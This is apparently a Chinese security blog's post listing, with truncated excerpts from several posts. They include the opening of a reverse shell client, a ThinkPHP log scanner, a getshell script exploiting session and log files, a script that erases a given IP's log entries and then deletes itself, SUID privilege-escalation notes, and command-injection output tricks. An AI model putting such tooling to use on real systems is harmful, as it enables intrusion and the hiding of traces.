摘要:
# reverse_client_bash.py import socket import sys import termios import tty from os import path, popen from sys import stdout # import thread, deal wi 阅读全文
posted @ 2020-05-14 10:52
0xdd
阅读(482)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2020-05-13 19:24
0xdd
阅读(25)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2020-05-13 14:34
0xdd
阅读(0)
评论(0)
推荐(0)
摘要:
环境 IntelliJ IDEA 2020.1 x64 tomcat-8.5.46 JRE1.8 配置 pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" 阅读全文
posted @ 2020-05-07 10:11
0xdd
阅读(361)
评论(0)
推荐(0)
摘要:
0X01 前言 本篇文章大多为转载,但是修正了一些不正确的说法,对某些功能点的变更指出具体是哪个版本变更,加入了一些小更新。 (原文地址:https://www.freebuf.com/articles/web/197013.html ,作者:温酒) 0x02 正文 函数修改 preg_replac 阅读全文
posted @ 2020-04-27 14:14
0xdd
阅读(256)
评论(0)
推荐(0)
摘要:
import requests,sys dirpath=[] def dirscan(url,year): for i in range(1,13): if i < 10: urls=url+'/runtime/log/'+year+'0'+str(i) else: urls=url+'/runti 阅读全文
posted @ 2020-04-23 11:02
0xdd
阅读(1369)
评论(0)
推荐(0)
摘要:
suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执行文件设置了suid权限。 设置了s位的程序在运行时,其Effective UID将会设置为这个程序 阅读全文
posted @ 2020-04-19 18:12
0xdd
阅读(547)
评论(0)
推荐(0)
摘要:
删除指定IP的日志后,删除自身 import os import time import sys ip="127.0.0.1" logpath="/var/lib/tomcat7/logs/" logname="localhost_access_log." if len(sys.argv) < 2: 阅读全文
posted @ 2020-04-17 17:10
0xdd
阅读(186)
评论(0)
推荐(0)
摘要:
年前写的了,做测试用,主要利用 session getshell 或者thinkphp 的log //勿用attack 测试 import requests import time import sys def session_write(url): fuck = {'_method': '__co 阅读全文
posted @ 2020-04-17 00:10
0xdd
阅读(1691)
评论(0)
推荐(0)
摘要:
DNSlog 出属于, POST DATA HEX 等一些 命令延迟注入 找WEB PATH 将id,pwd,hostname的结果写在js/test1.txt中,命令find . -type f -name 1.js|while read f;do sh -c 'id;pwd;hostname;/ 阅读全文
posted @ 2020-04-10 16:17
0xdd
阅读(271)
评论(0)
推荐(0)